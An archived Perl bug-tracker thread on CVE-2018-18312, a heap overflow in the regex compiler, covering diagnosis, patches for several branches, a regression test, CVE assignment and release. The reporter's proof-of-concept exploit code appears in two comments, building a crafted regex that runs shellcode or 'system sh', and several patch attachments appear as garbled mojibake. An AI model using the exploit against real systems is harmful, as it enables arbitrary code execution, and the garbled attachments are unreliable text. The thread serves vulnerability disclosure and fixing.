[CVE-2018-18312] regcomp: heap-buffer-overflow write / reg_node overrun (perl-5.28.0, 5.26.2) #16649
Comments
From @Etsukata# Summary - a crafted regular expression can cause heap-buffer-overflow write during # Affected Versions - 5.29.1 # PoC - 5.28.0 ==6867== Memcheck, a memory error detector - 5.26.2 |
From @khwilliamsonI suspect this is a serious security issue. One can position where beyond the end of buffer gets written by adding \x80's to the ones already there. But I'd be happy to be wrong about this. The cause is one branch during the parsing leaves the parse pointer positioned one too far, and that causes the backslash to be skipped during pass2, which causes a ']' to be treated as a metacharacter instead of a literal. The fix is to remove the single line that incorrectly increments the parse pointer. There is another thing. The minus sign in this case could have been caught as incorrect. But the same out-of-bounds writes would occur if a '^' replaced the minus, and that would be a correct use. Karl Williamson |
|
The RT System itself - Status changed from 'new' to 'open' |
From @khwilliamsonResending this as it did not make it to the list: On Wed, 15 Aug 2018 11:01:24 -0700, khw wrote:
|
From @EtsukataThe following code generates a regexp which executes arbitrary command Limitations: - must set `execstack -s` to perl ``` # use strict; # 0xabcd => '\xcd\xab\x00\x00\x00\x00\x00\x00' # must set `execstack -s` to perl my $address = 0xa34c7d; # overwrite start address my $body = # xmg_stash($stash_address) . '" . "a" x 19 . "' # padding # xmg_magic($magic_address) # mg_virual($mg_virtual_address) # x86_64 shell_code . '])a\\\\6"; qr/$r/\''; my $payload = $prefix . $body; print $cmd . $payload . "\n"; Sample output ``` EXECUTING... Compiling REx ?aaaaaaaaaaaaaaaaaaa}L?M?<M?H1H?/bin//shPH?WH??B;])a\6/ at -e line 1. ?aaaaaaaaaaaaaaaaaaa}L?M?<M?H1H?/bin//shPH?WH??B;])a\6/ at -e line 1. Breakpoint 1, S_regatom (pRExC_state=pRExC_state@entry=0x7fffffffcd40, Breakpoint 2, S_mg_free_struct (sv=sv@entry=0xa34ca5, mg=0xa34ce8) at 2018-08-16 12:52 GMT+09:00 Karl Williamson via RT <
|
From @khwilliamsonOn 08/27/2018 07:16 AM, Eiichi Tsukata wrote:
Shouldn't this be getting a CVE?
|
From @tonycozOn Wed, 15 Aug 2018 11:01:24 -0700, khw wrote:
Could you please make patches against blead/maint-5.28/maint-5.26 for this? Thanks, |
From @tonycozOn Wed, 29 Aug 2018 23:52:16 -0700, public@khwilliamson.com wrote:
I plan to request a CVE ID for this issue in the next couple of days. If anyway has already requested an ID, please let me know. Thanks, |
From @Etsukata
update: this limitation can be reduced by calling Perl_eval_sv with crafted - code ``` # use strict; # 0xabcd => '\xcd\xab\x00\x00\x00\x00\x00\x00' my $cmd = 'gdb -x gdbcmd -q --args my $addr = 0xbacbfc; # overwrite start addr # $ nm /path/to/perl | grep Perl_eval_sv my $body = '' # sv($addr) obj # sv_flags # sv_u.svu_pv : ptr to "system sh" # any($addr_sv_any) ## xmg_stash($addr_stash) # $addr_system_sh . "A" x 10 # padding # xmg_magic($addr_magic) my $payload = $prefix . $body; print $cmd . $payload . "\n"; - output ``` [eiichi@x1 exploit]$ gdb -x gdbcmd -q --args h̺system h̺system Breakpoint 1, S_regatom (pRExC_state=0x7fffffffcc80, flagp=0x7fffffffc220, 2018年9月24日(月) 15:41 Tony Cook via RT <
|
From @khwilliamsonOn 09/19/2018 06:28 PM, Tony Cook via RT wrote:
Attached |
From @khwilliamson0242-PATCH-perl-133423-for-5.26-maint.patch䙲潭昲㠵㡥愲㡥戲挷攰ち㑢搶愵敤㤵攴㜸㉦㠸㌳㌠䵯渠卥瀠ㄷ‰〺〰㨰〠㈰〱牯洺⁋慲氠坩汬楡浳潮‼歨着捰慮牧㸊䑡瑥㨠䵯測′㐠卥瀠㈰ㄸ‱ㄺ㔴㨴ㄠⴰ㘰《卵扪散琺⁛偁呃䠠㈴㈯㈴㉝⁐䅔䍈㨠孰敲氠⌱㌳㐲㍝潲‵⸲㘠浡楮琊ਭⴭਠ牥杣潭瀮挠†††簠ㄠⴊ⁴⽲支牥束浥獧⁼‴⬫⬊′楬敳桡湧敤Ⱐ㐠楮獥牴楯湳⠫⤬‱敬整楯渨ਊ摩晦ⵧ楴⽲敧捯浰⽲敧捯浰੩湤數愴㝤户㔷㌮⸴㌱〰㙥㠵㔠〶㐴ਭⴭ⽲敧捯浰ਫ⬫⽲敧捯浰ੀ䀠ⴱ㔱〹ⰷㄵ㤬㘠䁀敤潟捵牣桡爺ਠ††††††††††剅硃彰慲獥⬫㬊††††††††††獳敲琨啃䡁剁吨剅硃彰慲獥⤠㴽‧⤧⤻ਠਭ††††††††††剅硃彰慲獥⬫㬊††††††††††⁒䕸䍟晬慧猠㴠獡癥彦污杳㬊††††††††††潴漠桡湤汥彯灥牡湤㬊††††††††⁽楦映ⴭ杩琠愯琯牥⽲敧彭敳朮琠戯琯牥⽲敧彭敳朮琊楮摥砠㌹捦捦㝤昱⸮搲㙡㝣慦㌷‱〰㘴㐊ⴭⴠ愯琯牥⽲敧彭敳朮琊⬫⬠戯琯牥⽲敧彭敳朮琊䁀㘬㘠⬱〶ⰸ⁀䀠浹․桩杨彭楸敤彤楧楴‽
❁✠汴‧〧⤠㼠✰✠㨠❁✻ਠ浹․捯汯湟桥砠㴠獰物湴映∥〲堢Ⱐ潲搨∺∩㬊礠⑴慢彨數‽灲楮瑦•┰㉘∬牤⠢屴∩㬊 ⭭礠③畧ㄳ㌴㈳‽•⠿嬨㽞㨨㽛屜屸〰崩⥜屝屸〰簲孞幝屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰崩刮屜㘷〢㬊⬊‣⌊‣⌠䭥礭癡汵攠灡楲猠潦潤支敲牯爠潦潤攠瑨慴桯畬搠桡癥慴慬牲潲献ਠ⌣ੀ䀠ⴲ㤰ⰶ㈹㈬㠠䁀礠䁤敡瑨‽ਠ‧⼨㽸浳楸瀩慢振✠㴾•∬ਠ‧⼨㽸硸砺慢挩⼧‽㸠∢Ⰺ†✯⠿㰽⼧‽㸠❓敱略湣攠⠿⸮⸠湯琠瑥牭楮慴敤⁻⍽⼨㼼㵻⍽⼧Ⱐ†††††††††††‣⁛灥牬‣ㄲ㠱㜰崊⬠∯③畧ㄳ㌴㈳⼢‽㸠≏灥牡湤⁷楴栠湯⁰牥捥摩湧灥牡瑯爠笣素洯⠿嬨㽞㨨㽛屜]⤩屜笣絝|㉛幞嵜砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸そ⥒⹜尶㜰⼢Ⰺ⬊
㬊 ⴭ ㈮ㄷ⸱ਊ |
From @khwilliamson0003-PATCH-perl-133423-for-maint-5.28.patch牆浯〠㠴㔹愸㕡㌴㤷づ〲㌹㘲昸㔸戱㔵㍢敤戳㜴昵潍敓⁰㜱〠㨰〰〺‰〲䘊潲㩭䬠牡楗汬慩獭湯㰠桫䁷灣湡漮杲ਾ慄整›潍Ɱ㈠‴敓⁰〲㠱ㄠ㨱㔵㔺‵〭〶ਰ畓橢捥㩴嬠䅐䍔⁈⼳崳倠呁䡃›灛牥ㄣ㌳㈴崳映牯洠楡瑮㔠㈮ਸⴊⴭ 敲捧浯†††⁼‱ਭ琠爯⽥敲彧敭杳琮簠㌠⬠⬫ ′楦敬档湡敧Ɽ㌠椠獮牥楴湯⡳⤫‱敤敬楴湯搊晩ⴭ楧⁴⽡敲捧浯⽢敲捧浯湩敤⁸㙦㐹晦昷戸⸮ㅥ慤㔱㝡挷ㄠ〰㐶ⴭ⽡敲捧浯⬫⽢敲捧浯䁀ⴠ㔱㤵ⰱ‷ㄫ㔵ㄹ㘬䀠⁀敲潤损牵档牡††††††††††椠唨䡃剁呁刨硅彃慰獲⥥℠‽⤧⤧ ††††††††††††䙶䥁⡌䔢灸捥楴杮挠潬敳瀠牡湥映牯眠慲灰牥映牯渠獥整硥整摮摥挠慨捲慬獳⤢ਠ†††††††††删硅彃慰獲⭥㬫 ††††††††††䕒䍸晟慬獧㴠猠癡彥汦条㭳 ††††††††††潧潴栠湡汤彥灯牥湡㭤 ††††††††楤晦ⴠ札瑩愠琯爯⽥敲彧敭杳琮戠琯爯⽥敲彧敭杳琮椊摮硥㔠扦昱愱㘴㈮㠸戰㑥攵〱㘰㐴ⴊⴭ愠琯爯⽥敲彧敭杳琮⬊⬫戠琯爯⽥敲彧敭杳琮䀊⁀ㄭ㈲㘬⬠㈱ⰲ‸䁀洠⁹琤扡桟硥㴠猠牰湩晴∠〥堲Ⱒ漠摲∨瑜⤢⌠ ‣桔楦獲⁴敳⁴牡桴獯桴瑡猠潨汵敢映瑡污攠牲牯 ⬊祭␠畢ㅧ㌳㈴″‽⠢嬿㼨㩞㼨屛屜へ崰⤩屜屝へ簰嬲幞屝㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸崰利尮㙜〷㬢⬊ 祭䀠敤瑡⠠ ✠嬯㵛潦㵯嵝✯㴠‾倧协塉猠湹慴⁸㵛㴠⁝獩爠獥牥敶潦畦畴敲攠瑸湥楳湯⍻⁽⽭孛昽潯崽⍻嵽✯ਬ䁀ⴠ〳ⰷ‶㌫㤰㜬䀠⁀祭䀠敤瑡†⼧䅜⽻‧㸽✠湕獥慣数敬瑦戠慲散椠敲敧⁸獩椠汬来污栠牥⍻⁽⽭䅜筻紣✯ਬ†⼧㼨㴼✯㴠‾匧煥敵据㼨⸮潮⁴整浲湩瑡摥笠紣洠⠯㰿笽紣✯†††††††††††⌠嬠数汲⌠㈱ㄸ〷†⼧灜登牥楴慣慴絢✯㴠‾䌧湡❜⁴楦摮唠楮潣敤瀠潲数瑲⁹敤楦楮楴湯∠敶瑲捩污ଠ琠扡•⍻⁽⽭屜筰敶瑲捩污ଠ琠扡筽紣✯‣灛牥ㄣ㈳㔰崵⬊∠畢ㅧ㌳㈴⼳•㸽∠灏牥湡楷桴渠牰捥摥湩灯牥瑡牯笠紣洠⠯嬿㼨㩞㼨屛\⥝尩筜紣]㉼幛嵞硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸⥝⹒屜㜶⼰Ⱒ 㬩 ⴊ㈊ㄮ⸷ |
From @tonycozOn Mon, 24 Sep 2018 11:01:56 -0700, public@khwilliamson.com wrote:
Thanks, though they seem to be corrupted in RT, trying again. Tony |
From @tonycoz0003-PATCH-perl-133423-for-maint-5.28.patchFrom 048958aa54379e02093268f851b55b3de3b475fe Mon Sep 17 00:00:00 2001
From: Karl Williamson <khw@cpan.org>
Date: Mon, 24 Sep 2018 11:55:55 -0600
Subject: [PATCH 3/3] PATCH: [perl #133423] for maint 5.28
---
regcomp.c | 1 -
t/re/reg_mesg.t | 3 +++
2 files changed, 3 insertions(+), 1 deletion(-)
diff --git a/regcomp.c b/regcomp.c
index f694ff7f8b..e1da15a77c 100644
--- a/regcomp.c
+++ b/regcomp.c
@@ -15591,7 +15591,6 @@ redo_curchar:
if (UCHARAT(RExC_parse) != ')')
vFAIL("Expecting close paren for wrapper for nested extended charclass");
- RExC_parse++;
RExC_flags = save_flags;
goto handle_operand;
}
diff --git a/t/re/reg_mesg.t b/t/re/reg_mesg.t
index 5fb1f1a46c..2880be45eb 100644
--- a/t/re/reg_mesg.t
+++ b/t/re/reg_mesg.t
@@ -122,6 +122,8 @@ my $tab_hex = sprintf "%02X", ord("\t");
#
# The first set are those that should be fatal errors.
+my $bug133423 = "(?[(?^:(?[\\\x00]))\\]\x00|2[^^]\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80])R.\\670";
+
my @death =
(
'/[[=foo=]]/' => 'POSIX syntax [= =] is reserved for future extensions {#} m/[[=foo=]{#}]/',
@@ -307,6 +309,7 @@ my @death =
'/\A{/' => 'Unescaped left brace in regex is illegal here {#} m/\A{{#}/',
'/(?<=/' => 'Sequence (?... not terminated {#} m/(?<={#}/', # [perl #128170]
'/\p{vertical � tab}/' => 'Can\'t find Unicode property definition "vertical � tab" {#} m/\\p{vertical � tab}{#}/', # [perl #132055]
+ "/$bug133423/" => "Operand with no preceding operator {#} m/(?[(?^:(?[\\�]))\\{#}]�|2[^^]\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80])R.\\670/",
);
--
2.17.1
|
From @tonycoz0242-PATCH-perl-133423-for-5.26-maint.patchFrom df2858ea28eb2c7e00a4bd6a5ed95e4782f88333 Mon Sep 17 00:00:00 2001
From: Karl Williamson <khw@cpan.org>
Date: Mon, 24 Sep 2018 11:54:41 -0600
Subject: [PATCH 242/242] PATCH: [perl #133423] for 5.26 maint
---
regcomp.c | 1 -
t/re/reg_mesg.t | 4 ++++
2 files changed, 4 insertions(+), 1 deletion(-)
diff --git a/regcomp.c b/regcomp.c
index ca47db7573..431006e855 100644
--- a/regcomp.c
+++ b/regcomp.c
@@ -15109,7 +15109,6 @@ redo_curchar:
RExC_parse++;
assert(UCHARAT(RExC_parse) == ')');
- RExC_parse++;
RExC_flags = save_flags;
goto handle_operand;
}
diff --git a/t/re/reg_mesg.t b/t/re/reg_mesg.t
index 39cfcf7df1..d26a7caf37 100644
--- a/t/re/reg_mesg.t
+++ b/t/re/reg_mesg.t
@@ -106,6 +106,8 @@ my $high_mixed_digit = ('A' lt '0') ? '0' : 'A';
my $colon_hex = sprintf "%02X", ord(":");
my $tab_hex = sprintf "%02X", ord("\t");
+my $bug133423 = "(?[(?^:(?[\\\x00]))\\]\x00|2[^^]\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80])R.\\670";
+
##
## Key-value pairs of code/error of code that should have fatal errors.
##
@@ -290,6 +292,8 @@ my @death =
'/(?xmsixp)abc/' => "",
'/(?xxxx:abc)/' => "",
'/(?<=/' => 'Sequence (?... not terminated {#} m/(?<={#}/', # [perl #128170]
+ "/$bug133423/" => "Operand with no preceding operator {#} m/(?[(?^:(?[\\�]))\\{#}]�|2[^^]\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80])R.\\670/",
+
);
--
2.17.1
|
From @tonycozOn Mon, 24 Sep 2018 11:01:56 -0700, public@khwilliamson.com wrote:
Do you have a similar patch for blead? I managed to forward-port the 5.28 patch, but the error message isn't matching in the test, I don't know if that's due to some other change or not. Tony |
From @khwilliamsonOn 10/01/2018 10:35 PM, Tony Cook via RT wrote:
I don't know why that would be. Attached is a blead patch that passes |
From @khwilliamson0001-PATCH-perl-133423.patch䙲潭搶愹攸昱㤶挵晡㥢㤱㔹攱愷㔳㐳㙣㜱㕤㑦㐠䵯渠卥瀠ㄷ‰〺〰㨰〠㈰〱牯洺⁋慲氠坩汬楡浳潮‼歨着捰慮牧㸊䑡瑥㨠䵯測′㐠卥瀠㈰ㄸ‱ㄺㄶ㨱㐠ⴰ㘰《卵扪散琺⁛偁呃䡝⁐䅔䍈㨠孰敲氠⌱㌳㐲㍝ਊⴭⴊ敧捯浰†††⁼‱ਠ琯牥⽲敧彭敳朮琠簠㌠⬫⬊′楬敳桡湧敤Ⱐ㌠楮獥牴楯湳⠫⤬‱敬整楯渨ਊ摩晦ⵧ楴⽲敧捯浰⽲敧捯浰੩湤數㌰㍣㘲㠴愮⸱㡤扦ㅣ㌰㤠〶㐴ਭⴭ⽲敧捯浰ਫ⬫⽲敧捯浰ੀ䀠ⴱ㔶ㄵⰷㄵ㘱㔬㘠䁀敤潟捵牣桡爺ਠ††††††††††楦
啃䡁剁吨剅硃彰慲獥⤠ℽ‧⤧⤊††††††††††††⁶䙁䥌⠢䕸灥捴楮朠捬潳攠灡牥渠景爠睲慰灥爠景爠湥獴敤硴敮摥搠捨慲捬慳猢⤻ਠਭ††††††††††剅硃彰慲獥⬫㬊††††††††††⁒䕸䍟晬慧猠㴠獡癥彦污杳㬊††††††††††潴漠桡湤汥彯灥牡湤㬊††††††††⁽楦映ⴭ杩琠愯琯牥⽲敧彭敳朮琠戯琯牥⽲敧彭敳朮琊楮摥砠㌶戶㜴㜴㙦⸮愸㐳㤴愰愷‱〰㘴㐊ⴭⴠ愯琯牥⽲敧彭敳朮琊⬫⬠戯琯牥⽲敧彭敳朮琊䁀ㄲ㈬㘠⬱㈲ⰸ⁀䀠浹․瑡扟桥砠㴠獰物湴映∥〲堢Ⱐ潲搨≜琢⤻ਠ⌊‣⁔桥楲獴整牥⁴桯獥⁴桡琠獨潵汤攠晡瑡氠敲牯牳⸊ ⭭礠③畧ㄳ㌴㈳‽•⠿嬨㽞㨨㽛屜屸〰崩⥜屝屸〰簲孞幝屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰崩刮屜㘷〢㬊⬊礠䁤敡瑨‽ਠ⠊†✯孛㵦潯㵝崯✠㴾‧偏卉堠獹湴慸⁛㴠㵝猠牥獥牶敤潲畴畲攠數瑥湳楯湳⁻⍽⽛嬽景漽嵻⍽崯✬ੀ䀠ⴳⰶ㌱㈬㜠䁀礠䁤敡瑨‽ਠ‧⽜灻䱡瑩湽第㐠累✠㴾‧啮敳捡灥搠汥晴牡捥渠牥来砠楳汬敧慬敲攠笣素洯屰筌慴楮絻笣紬㐠累✬ਠ‧⼨㼼㴯✠㴾‧卥煵敮捥
㼮⸮潴⁴敲浩湡瑥搠笣素洯⠿㰽笣累✬††††††††††††⌠孰敲氠⌱㈸ㄷそਠ‧⽜灻癥牴楣慬⁴慢累✠㴾‧䍡湜❴楮搠啮楣潤攠灲潰敲瑹敦楮楴楯渠≶敲瑩捡氠ଠ瑡戢⁻⍽⽜屰筶敲瑩捡氠ଠ瑡扽笣累✬‣⁛灥牬‣ㄳ㈰㔵崊⬠∯③畧ㄳ㌴㈳⼢‽㸠≏灥牡湤⁷楴栠湯⁰牥捥摩湧灥牡瑯爠笣素洯⠿嬨㽞㨨㽛屜]⤩屜笣絝|㉛幞嵜砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸そ⥒⹜尶㜰⼢Ⰺ
㬊 ⴭ ㈮ㄷ⸱ਊ |
From @tonycozOn Tue, 02 Oct 2018 06:34:41 -0700, public@khwilliamson.com wrote:
I think it might have been because I was copying and pasting from the patch in the browser rather than from the file. And the new patch was garbled too - I see a bunch of chinese characters when I view it in the browser (which thinks it's UTF-8.) If I dump the bytes I see: 00000000 e4 99 b2 e6 bd ad e2 81 a5 e6 90 b6 e6 84 b9 e6 |................| at the start. I've attached the copy that came via email, to ensure we have a readable copy on the ticket. Tony |
From @tonycoz0001-PATCH-perl-133423.patchFrom ed6a9e8f196c5fa9b9159e1a753436c10715d4f4 Mon Sep 17 00:00:00 2001
From: Karl Williamson <khw@cpan.org>
Date: Mon, 24 Sep 2018 11:16:14 -0600
Subject: [PATCH] PATCH: [perl #133423]
---
regcomp.c | 1 -
t/re/reg_mesg.t | 3 +++
2 files changed, 3 insertions(+), 1 deletion(-)
diff --git a/regcomp.c b/regcomp.c
index b303c6284a..18dbf1c309 100644
--- a/regcomp.c
+++ b/regcomp.c
@@ -15615,7 +15615,6 @@ redo_curchar:
if (UCHARAT(RExC_parse) != ')')
vFAIL("Expecting close paren for wrapper for nested extended charclass");
- RExC_parse++;
RExC_flags = save_flags;
goto handle_operand;
}
diff --git a/t/re/reg_mesg.t b/t/re/reg_mesg.t
index 36b674746f..a84394a0a7 100644
--- a/t/re/reg_mesg.t
+++ b/t/re/reg_mesg.t
@@ -122,6 +122,8 @@ my $tab_hex = sprintf "%02X", ord("\t");
#
# The first set are those that should be fatal errors.
+my $bug133423 = "(?[(?^:(?[\\\x00]))\\]\x00|2[^^]\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80])R.\\670";
+
my @death =
(
'/[[=foo=]]/' => 'POSIX syntax [= =] is reserved for future extensions {#} m/[[=foo=]{#}]/',
@@ -310,6 +312,7 @@ my @death =
'/\p{Latin}{,4 }/' => 'Unescaped left brace in regex is illegal here {#} m/\p{Latin}{{#},4 }/',
'/(?<=/' => 'Sequence (?... not terminated {#} m/(?<={#}/', # [perl #128170]
'/\p{vertical � tab}/' => 'Can\'t find Unicode property definition "vertical � tab" {#} m/\\p{vertical � tab}{#}/', # [perl #132055]
+ "/$bug133423/" => "Operand with no preceding operator {#} m/(?[(?^:(?[\\�]))\\{#}]�|2[^^]\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80])R.\\670/",
);
--
2.17.1
|
From @tonycozOn Sun, Oct 07, 2018 at 05:44:57PM -0700, Tony Cook via RT wrote:
Trying via email to see if it happens for me too. Tony |
From @tonycoz0001-PATCH-perl-133423.patchFrom ed6a9e8f196c5fa9b9159e1a753436c10715d4f4 Mon Sep 17 00:00:00 2001
From: Karl Williamson <khw@cpan.org>
Date: Mon, 24 Sep 2018 11:16:14 -0600
Subject: [PATCH] PATCH: [perl #133423]
---
regcomp.c | 1 -
t/re/reg_mesg.t | 3 +++
2 files changed, 3 insertions(+), 1 deletion(-)
diff --git a/regcomp.c b/regcomp.c
index b303c6284a..18dbf1c309 100644
--- a/regcomp.c
+++ b/regcomp.c
@@ -15615,7 +15615,6 @@ redo_curchar:
if (UCHARAT(RExC_parse) != ')')
vFAIL("Expecting close paren for wrapper for nested extended charclass");
- RExC_parse++;
RExC_flags = save_flags;
goto handle_operand;
}
diff --git a/t/re/reg_mesg.t b/t/re/reg_mesg.t
index 36b674746f..a84394a0a7 100644
--- a/t/re/reg_mesg.t
+++ b/t/re/reg_mesg.t
@@ -122,6 +122,8 @@ my $tab_hex = sprintf "%02X", ord("\t");
#
# The first set are those that should be fatal errors.
+my $bug133423 = "(?[(?^:(?[\\\x00]))\\]\x00|2[^^]\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80])R.\\670";
+
my @death =
(
'/[[=foo=]]/' => 'POSIX syntax [= =] is reserved for future extensions {#} m/[[=foo=]{#}]/',
@@ -310,6 +312,7 @@ my @death =
'/\p{Latin}{,4 }/' => 'Unescaped left brace in regex is illegal here {#} m/\p{Latin}{{#},4 }/',
'/(?<=/' => 'Sequence (?... not terminated {#} m/(?<={#}/', # [perl #128170]
'/\p{vertical � tab}/' => 'Can\'t find Unicode property definition "vertical � tab" {#} m/\\p{vertical � tab}{#}/', # [perl #132055]
+ "/$bug133423/" => "Operand with no preceding operator {#} m/(?[(?^:(?[\\�]))\\{#}]�|2[^^]\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80])R.\\670/",
);
--
2.17.1
|
From @tonycozOn Sun, 23 Sep 2018 23:41:05 -0700, tonyc wrote:
This is CVE-2018-18312. |
From @tonycozOn Tue, 02 Oct 2018 06:34:41 -0700, public@khwilliamson.com wrote:
For anyone following along, the blead patch is no longer relevant, due to the sizing pass removal (maint will still need their patches applied.) Tony |
From @khwilliamsonOn Sat, 20 Oct 2018 20:52:49 -0700, tonyc wrote:
Actually the blead patch is relevant to fixing a bug; it's just that it is no longer a security threat. I'll wait to apply the patch, and other relevant ones until the maintenance releases are done. Removing the sizing pass should remove this entire class of errors from being security issues. |
From @steve-m-hayMoved to public queue with the release of 5.26.3 and 5.28.1. |
From [Unknown Contact. See original ticket]Moved to public queue with the release of 5.26.3 and 5.28.1. |
From @khwilliamsonNow fixed. Note that this actually got fixed in as a security issue in blead earlier than the commit listed |
|
@khwilliamson - Status changed from 'open' to 'pending release' |
From @khwilliamsonThank you for filing this report. You have helped make Perl better. With the release today of Perl 5.30.0, this and 160 other issues have been Perl 5.30.0 may be downloaded via: If you find that the problem persists, feel free to reopen this ticket. |
|
@khwilliamson - Status changed from 'pending release' to 'resolved' |
Migrated from rt.perl.org#133423 (status was 'resolved')
Searchable as RT133423$
The text was updated successfully, but these errors were encountered: